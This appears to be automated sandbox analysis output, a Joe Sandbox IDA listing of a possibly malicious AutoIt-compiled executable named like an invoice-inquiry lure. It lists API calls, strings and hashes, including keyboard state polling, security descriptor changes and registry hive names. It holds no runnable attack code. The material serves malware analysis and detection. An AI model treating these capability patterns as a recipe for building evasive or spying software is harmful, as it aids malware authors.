                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E4C4E6
                                          • SetWindowTextW.USER32(?,?), ref: 00E4C4FD
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E4C512
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E4C518
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C528
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E4C52E
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E4C54F
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E4C569
                                          • GetWindowRect.USER32(?,?), ref: 00E4C572
                                          • SetWindowTextW.USER32(?,?), ref: 00E4C5DD
                                          • GetDesktopWindow.USER32 ref: 00E4C5E3
                                          • GetWindowRect.USER32(00000000), ref: 00E4C5EA
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E4C636
                                          • GetClientRect.USER32(?,?), ref: 00E4C643
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E4C668
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E4C693
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 7c4c1a4a3ee0f2d798e4b65f5ff47770c4b9a2d10812e6cbcc5b654be1d92560
                                          • Instruction ID: 58974f29f89f31197522713a2f8977d412ef66d1df8882f93be1e26bc7c03b4b
                                          • Opcode Fuzzy Hash: 7c4c1a4a3ee0f2d798e4b65f5ff47770c4b9a2d10812e6cbcc5b654be1d92560
                                          • Instruction Fuzzy Hash: E2515C70900709AFDB20DFA9DE89B6EBBF5FF04709F104929E686B35A0D774A944CB50
                                          APIs
                                          • _memset.LIBCMT ref: 00E7A4C8
                                          • DestroyWindow.USER32(?,?), ref: 00E7A542
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E7A5BC
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E7A5DE
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E7A5F1
                                          • DestroyWindow.USER32(00000000), ref: 00E7A613
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DF0000,00000000), ref: 00E7A64A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E7A663
                                          • GetDesktopWindow.USER32 ref: 00E7A67C
                                          • GetWindowRect.USER32(00000000), ref: 00E7A683
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E7A69B
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E7A6B3
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          Strings
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 680c5460dce900a5e072d9a5150158f1c23568684bd3e194bf92a4a4e4058664
                                          • Instruction ID: 8e3929fd82752b8fb4019675d9286b9b9c307ff7528a20c5b603370f9c8a1650
                                          • Opcode Fuzzy Hash: 680c5460dce900a5e072d9a5150158f1c23568684bd3e194bf92a4a4e4058664
                                          • Instruction Fuzzy Hash: 0D71C071140205AFD725CF68CC45FAB7BE5FB88704F18852DF989A72A0C774E946CB62
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E746AB
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E746F6
                                          Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E7BB6E
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00E76D80,?), ref: 00E7BBCA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E7BC03
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E7BC46
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E7BC7D
• FreeLibrary.KERNEL32(?), ref: 00E7BC89
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E7BC99
• DestroyIcon.USER32(?), ref: 00E7BCA8
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E7BCC5
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E7BCD1
  • Part of subcall function 00E1313D: __wcsicmp_l.LIBCMT ref: 00E131C6
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
APIs
• LoadStringW.USER32(00000066,?,00000FFF,00E7FB78), ref: 00E5A0FC
  • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
• LoadStringW.USER32(?,?,00000FFF,?), ref: 00E5A11E
• __swprintf.LIBCMT ref: 00E5A177
• __swprintf.LIBCMT ref: 00E5A190
• _wprintf.LIBCMT ref: 00E5A246
• _wprintf.LIBCMT ref: 00E5A264
Similarity
• API ID: LoadString__swprintf_wprintf$_memmove
• String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
• API String ID: 311963372-1048875529
APIs
  • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
  • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
• CharLowerBuffW.USER32(?,?), ref: 00E5A636
• GetDriveTypeW.KERNEL32 ref: 00E5A683
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A6CB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A702
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5A730
  • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E5A47A
• __swprintf.LIBCMT ref: 00E5A49C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00E5A4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E5A4FE
• _memset.LIBCMT ref: 00E5A51D
• _wcsncpy.LIBCMT ref: 00E5A559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E5A58E
• CloseHandle.KERNEL32(00000000), ref: 00E5A599
• RemoveDirectoryW.KERNEL32(?), ref: 00E5A5A2
• CloseHandle.KERNEL32(00000000), ref: 00E5A5AC
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
Similarity
• API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
• String ID:
• API String ID: 884005220-0
APIs
  • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E7C4EC
• GetFocus.USER32 ref: 00E7C4FC
• GetDlgCtrlID.USER32(00000000), ref: 00E7C507
• _memset.LIBCMT ref: 00E7C632
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E7C65D
• GetMenuItemCount.USER32(?), ref: 00E7C67D
• GetMenuItemID.USER32(?,00000000), ref: 00E7C690
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E7C6C4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E7C70C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E7C744
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E7C779
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
APIs
  • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
  • Part of subcall function 00E4874A: GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
  • Part of subcall function 00E4874A: GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
  • Part of subcall function 00E4874A: HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
  • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
  • Part of subcall function 00E487E7: GetProcessHeap.KERNEL32(00000008,00E48240,00000000,00000000,?,00E48240,?), ref: 00E487F3
  • Part of subcall function 00E487E7: HeapAlloc.KERNEL32(00000000,?,00E48240,?), ref: 00E487FA
  • Part of subcall function 00E487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E48240,?), ref: 00E4880B
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E48458
• _memset.LIBCMT ref: 00E4846D
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E4848C
• GetLengthSid.ADVAPI32(?), ref: 00E4849D
• GetAce.ADVAPI32(?,00000000,?), ref: 00E484DA
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E484F6
• GetLengthSid.ADVAPI32(?), ref: 00E48513
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E48522
• HeapAlloc.KERNEL32(00000000), ref: 00E48529
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E4854A
• CopySid.ADVAPI32(00000000), ref: 00E48551
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E48582
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E485A8
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E485BC
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
APIs
• GetDC.USER32(00000000), ref: 00E676A2
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E676AE
• CreateCompatibleDC.GDI32(?), ref: 00E676BA
• SelectObject.GDI32(00000000,?), ref: 00E676C7
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E6771B
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E67757
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E6777B
• SelectObject.GDI32(00000006,?), ref: 00E67783
• DeleteObject.GDI32(?), ref: 00E6778C
• DeleteDC.GDI32(00000006), ref: 00E67793
• ReleaseDC.USER32(00000000,?), ref: 00E6779E
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
APIs
  • Part of subcall function 00E10B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DF6C6C,?,00008000), ref: 00E10BB7
  • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DF6D0D
• SetCurrentDirectoryW.KERNEL32(?), ref: 00DF6E5A
  • Part of subcall function 00DF59CD: _wcscpy.LIBCMT ref: 00DF5A05
  • Part of subcall function 00E1387D: _iswctype.LIBCMT ref: 00E13885
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 537147316-1018226102
APIs
• _memset.LIBCMT ref: 00DF45F9
• GetMenuItemCount.USER32(00EB6890), ref: 00E2D7CD
• GetMenuItemCount.USER32(00EB6890), ref: 00E2D87D
• GetCursorPos.USER32(?), ref: 00E2D8C1
• SetForegroundWindow.USER32(00000000), ref: 00E2D8CA
• TrackPopupMenuEx.USER32(00EB6890,00000000,?,00000000,00000000,00000000), ref: 00E2D8DD
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E2D8E9
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID:
• API String ID: 2751501086-0
APIs
• VariantInit.OLEAUT32(?), ref: 00E68BEC
• CoInitialize.OLE32(00000000), ref: 00E68C19
• CoUninitialize.OLE32 ref: 00E68C23
• GetRunningObjectTable.OLE32(00000000,?), ref: 00E68D23
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00E68E50
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00E82C0C), ref: 00E68E84
• CoGetObject.OLE32(?,00000000,00E82C0C,?), ref: 00E68EA7
• SetErrorMode.KERNEL32(00000000), ref: 00E68EBA
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E68F3A
• VariantClear.OLEAUT32(?), ref: 00E68F4A
                                          Strings
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID: ,,
                                          • API String ID: 2395222682-1556401989
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          Strings
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          APIs
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                            • Part of subcall function 00DF7A84: _memmove.LIBCMT ref: 00DF7B0D
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E555D2
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E555E8
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E555F9
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E5560B
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E5561C
                                          Strings
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          APIs
                                          • timeGetTime.WINMM ref: 00E5521C
                                            • Part of subcall function 00E10719: timeGetTime.WINMM(?,75C0B400,00E00FF9), ref: 00E1071D
                                          • Sleep.KERNEL32(0000000A), ref: 00E55248
                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E5526C
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E5528E
                                          • SetActiveWindow.USER32 ref: 00E552AD
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E552BB
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E552DA
                                          • Sleep.KERNEL32(000000FA), ref: 00E552E5
                                          • IsWindow.USER32 ref: 00E552F1
                                          • EndDialog.USER32(00000000), ref: 00E55302
                                          Strings
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          APIs
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • CoInitialize.OLE32(00000000), ref: 00E5D855
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E5D8E8
                                          • SHGetDesktopFolder.SHELL32(?), ref: 00E5D8FC
                                          • CoCreateInstance.OLE32(00E82D7C,00000000,00000001,00EAA89C,?), ref: 00E5D948
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E5D9B7
                                          • CoTaskMemFree.OLE32(?,?), ref: 00E5DA0F
                                          • _memset.LIBCMT ref: 00E5DA4C
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00E5DA88
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E5DAAB
                                          • CoTaskMemFree.OLE32(00000000), ref: 00E5DAB2
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00E5DAE9
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00E5DAEB
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E505A7
                                          • SetKeyboardState.USER32(?), ref: 00E50612
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E50632
                                          • GetKeyState.USER32(000000A0), ref: 00E50649
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E50678
                                          • GetKeyState.USER32(000000A1), ref: 00E50689
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E506B5
                                          • GetKeyState.USER32(00000011), ref: 00E506C3
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E506EC
                                          • GetKeyState.USER32(00000012), ref: 00E506FA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E50723
                                          • GetKeyState.USER32(0000005B), ref: 00E50731
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 00E4C746
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C758
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E4C7B6
                                          • GetDlgItem.USER32(?,00000002), ref: 00E4C7C1
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C7D3
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E4C827
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C835
                                          • GetWindowRect.USER32(00000000,?), ref: 00E4C846
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E4C889
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E4C897
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E4C8B4
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E4C8C1
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          APIs
                                            • Part of subcall function 00DF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DF2036,?,00000000,?,?,?,?,00DF16CB,00000000,?), ref: 00DF1B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DF20D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00DF216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00E2BEF6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF27
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF3E
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DF16CB,00000000,?,?,00DF1AE2,?,?), ref: 00E2BF5A
                                          • DeleteObject.GDI32(00000000), ref: 00E2BF6C
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          APIs
                                            • Part of subcall function 00DF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DF25EC
                                          • GetSysColor.USER32(0000000F), ref: 00DF21D3
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00E7F910), ref: 00E5AB76
                                          • GetDriveTypeW.KERNEL32(00000061,00EAA620,00000061), ref: 00E5AC40
                                          • _wcscpy.LIBCMT ref: 00E5AC6A
                                          Strings
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                            • Part of subcall function 00DF2344: GetCursorPos.USER32(?), ref: 00DF2357
                                            • Part of subcall function 00DF2344: ScreenToClient.USER32(00EB67B0,?), ref: 00DF2374
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000001), ref: 00DF2399
                                            • Part of subcall function 00DF2344: GetAsyncKeyState.USER32(00000002), ref: 00DF23A7
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E7C2E4
                                          • ImageList_EndDrag.COMCTL32 ref: 00E7C2EA
                                          • ReleaseCapture.USER32 ref: 00E7C2F0
                                          • SetWindowTextW.USER32(?,00000000), ref: 00E7C39A
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E7C3AD
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E7C48F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                          • API String ID: 1924731296-488423084
                                          • Opcode ID: f333d35b60a40298aa59c3a6af684569efcadbca1a8e2fa4c04f37332aa97f38
                                          • Instruction ID: 310fbf4c443dd68a1c5bda10c07dbc947a4dac4246060a4d36d6745352574d99
                                          • Opcode Fuzzy Hash: f333d35b60a40298aa59c3a6af684569efcadbca1a8e2fa4c04f37332aa97f38
                                          • Instruction Fuzzy Hash: 2F51AF70204304AFD704DF14D856FBA7BE5EF88314F10852DF699AB2E1DB34A958CB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 3194e00dd52f30dcf3fc07e769b2f9e6d0f6a9e1ef4d8c45a8ccc09a15c279b6
                                          • Instruction ID: 4bef16833f6880b18c0f1d003e6da659649e5f52fd57b8c9938f9af8d0a73cb0
                                          • Opcode Fuzzy Hash: 3194e00dd52f30dcf3fc07e769b2f9e6d0f6a9e1ef4d8c45a8ccc09a15c279b6
                                          • Instruction Fuzzy Hash: 3341F971A04219AADB249F74EC42FB6B3F4EF48304F25547EE649E6181EA71D982CB21
                                          APIs
                                          • _memset.LIBCMT ref: 00E773D9
                                          • CreateMenu.USER32 ref: 00E773F4
                                          • SetMenu.USER32(?,00000000), ref: 00E77403
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E77490
                                          • IsMenu.USER32(?), ref: 00E774A6
                                          • CreatePopupMenu.USER32 ref: 00E774B0
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E774DD
                                          • DrawMenuBar.USER32 ref: 00E774E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 29b56e7abd02afba2566fdefc0bfbfab0422d6dfde1bad4492d8d7bfa7692c38
                                          • Instruction ID: f7bddab0da508db097a6907cf282b28aa7b66efd394970038908d4b90d40138f
                                          • Opcode Fuzzy Hash: 29b56e7abd02afba2566fdefc0bfbfab0422d6dfde1bad4492d8d7bfa7692c38
                                          • Instruction Fuzzy Hash: 66414775A00209EFDB20DF65D884E9ABBF5FF49315F148029E959A7360E730AD14CB60
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E777CD
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00E777D4
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E777E7
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E777EF
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E777FA
                                          • DeleteDC.GDI32(00000000), ref: 00E77803
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E7780D
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E77821
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E7782D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                           • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: c54f9005e8c63a74d4122d67e0d324d1ce4588c8fbe1653abff2f62e8788b7ee
                                          • Instruction ID: c7664a4f384e6b9100005a4399aecbd219b9eec1e822f8114835557cd2b9462b
                                          • Opcode Fuzzy Hash: c54f9005e8c63a74d4122d67e0d324d1ce4588c8fbe1653abff2f62e8788b7ee
                                          • Instruction Fuzzy Hash: 0031AB32105215AFDF169FA5DC08FEA3B69FF09325F118225FA59B21A0CB31D861DBA0
                                          APIs
                                          • _memset.LIBCMT ref: 00E1707B
